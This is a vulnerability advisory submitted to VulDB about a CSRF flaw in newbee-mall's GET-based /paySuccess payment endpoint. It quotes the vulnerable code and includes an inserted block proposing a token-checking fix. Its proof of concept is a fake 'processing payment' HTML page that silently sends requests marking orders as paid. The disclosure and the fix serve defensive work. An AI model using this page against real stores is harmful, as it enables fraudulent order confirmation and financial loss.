| Title | newbee-ltd newbee-mall v1.0 CSRF |
|---|
| Description | # CSRF Vulnerability in Payment Processing
## Summary
A **CSRF vulnerability** exists in the payment success confirmation endpoint `/paySuccess`. Attackers can mark orders as paid without actual payment, potentially leading to fraudulent order processing.
## Vulnerability Details
### Configuration-Level Issue
**File**: `src/main/java/ltd/newbee/mall/config/NeeBeeMallWebMvcConfigurer.java`
```java
import org.springframework.context.annotation.Configuration;
import org.springframework.web.servlet.config.annotation.InterceptorRegistry;
import org.springframework.web.servlet.config.annotation.WebMvcConfigurer;

@Configuration
public class NeeBeeMallWebMvcConfigurer implements WebMvcConfigurer {
    @Override
    public void addInterceptors(InterceptorRegistry registry) {
        // ❌ Payment endpoints have no CSRF protection
        // No interceptor configured for payment operations
    }
}
```
### Endpoint-Level Code Analysis
**File**: `src/main/java/ltd/newbee/mall/controller/mall/OrderController.java` (Lines 147-156)
```java
@GetMapping("/paySuccess")
@ResponseBody
public Result paySuccess(@RequestParam("orderNo") String orderNo, @RequestParam("payType") int payType) {
    // ❌ CRITICAL: GET method for payment confirmation!
    // ❌ No CSRF token validation
    // ❌ No actual payment gateway verification
    // ⚠️ Trusts client-side payment confirmation
    String payResult = newBeeMallOrderService.paySuccess(orderNo, payType);
    if (ServiceResultEnum.SUCCESS.getResult().equals(payResult)) {
        return ResultGenerator.genSuccessResult();
    } else {
        return ResultGenerator.genFailResult(payResult);
    }
}
```
**Critical Security Flaws**:
1. ❌ Uses GET method for payment confirmation
2. ❌ No CSRF token validation
3. ❌ No server-side payment gateway verification
4. ⚠️ Can be triggered by a simple link click
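A defensive counterpart to the flaws above, added here as an example (not the project's code and not part of the original report): a `HandlerInterceptor` registered through the project's existing `addInterceptors` hook that rejects any non-POST request to `/paySuccess` and requires a per-session synchronizer token in an `X-CSRF-Token` header. The interceptor class, the header and session attribute names, and the `javax.servlet` (Spring Boot 2) API are assumptions; the controller method must also move from `@GetMapping` to `@PostMapping`, and the missing server-side payment-gateway verification still has to happen before an order is marked paid.

```java
import java.nio.charset.StandardCharsets;
import java.security.MessageDigest;
import java.util.UUID;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;
import javax.servlet.http.HttpSession;
import org.springframework.context.annotation.Configuration;
import org.springframework.web.servlet.HandlerInterceptor;
import org.springframework.web.servlet.config.annotation.InterceptorRegistry;
import org.springframework.web.servlet.config.annotation.WebMvcConfigurer;

@Configuration
public class NeeBeeMallWebMvcConfigurer implements WebMvcConfigurer {
    public void addInterceptors(InterceptorRegistry registry) {
        // Guard the payment confirmation route (the controller should also use @PostMapping).
        registry.addInterceptor(new CsrfTokenInterceptor()).addPathPatterns("/paySuccess");
    }

    // Synchronizer token per session. Attribute and header names are assumptions for this example.
    static class CsrfTokenInterceptor implements HandlerInterceptor {
        static final String SESSION_ATTR = "csrfToken";
        static final String HEADER = "X-CSRF-Token";

        // The same-origin checkout page embeds this value and sends it back in HEADER.
        static String tokenFor(HttpSession session) {
            String token = (String) session.getAttribute(SESSION_ATTR);
            if (token == null) {
                token = UUID.randomUUID().toString(); // 122 random bits from SecureRandom
                session.setAttribute(SESSION_ATTR, token);
            }
            return token;
        }

        @Override
        public boolean preHandle(HttpServletRequest req, HttpServletResponse resp, Object handler) throws Exception {
            // A state change must never be reachable through GET (img src, plain link).
            if (!"POST".equals(req.getMethod())) {
                resp.sendError(HttpServletResponse.SC_METHOD_NOT_ALLOWED);
                return false;
            }
            HttpSession session = req.getSession(false);
            String expected = session == null ? null : (String) session.getAttribute(SESSION_ATTR);
            String provided = req.getHeader(HEADER);
            // A cross-site page cannot read the session token; compare in constant time.
            if (expected == null || provided == null || !MessageDigest.isEqual(
                    expected.getBytes(StandardCharsets.UTF_8), provided.getBytes(StandardCharsets.UTF_8))) {
                resp.sendError(HttpServletResponse.SC_FORBIDDEN);
                return false;
            }
            return true;
        }
    }
}
```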
## Proof of Concept (PoC)
```html
<!DOCTYPE html>
<html>
<head>
    <title>Payment Processing</title>
</head>
<body>
    <h2>Processing your payment...</h2>
    <p>Please do not close this window.</p>
    <!-- Invisible image triggers payment confirmation -->
    <img src="http://localhost:28089/paySuccess?orderNo=202602051645001&payType=1"
         style="display:none;"
         onload="document.getElementById('msg').innerHTML='✅ Payment successful!'">
    <div id="msg"></div>
    <!-- Batch payment confirmation for multiple orders -->
    <script>
        var orders = [
            '202602051645001',
            '202602051645002',
            '202602051645003'
        ];
        orders.forEach(function(orderNo) {
            var img = new Image();
            img.src = 'http://localhost:28089/paySuccess?orderNo=' + orderNo + '&payType=1';
        });
    </script>
</body>
</html>
```
## Impact
**Fraudulent payment confirmation without actual payment** - Attackers can mark orders as paid without completing payment, leading to unauthorized product delivery and financial loss for the business.
---
**CVSS Score**: 8.6 (High)
|
|---|
| Source | ⚠️ https://github.com/newbee-ltd/newbee-mall/issues/113 |
|---|
| User | flashzyc (UID 92850) |
|---|
| Submission | 02/05/2026 11:58 (4 months ago) |
|---|
| Moderation | 02/18/2026 07:56 (13 days later) |
|---|
| Status | Duplicate |
|---|
| VulDB entry | 346456 [newbee-ltd newbee-mall up to a069069b07027613bf0e7f571736be86f431faee Multiple Endpoints cross-site request forgery] |
|---|
| Points | 0 |
|---|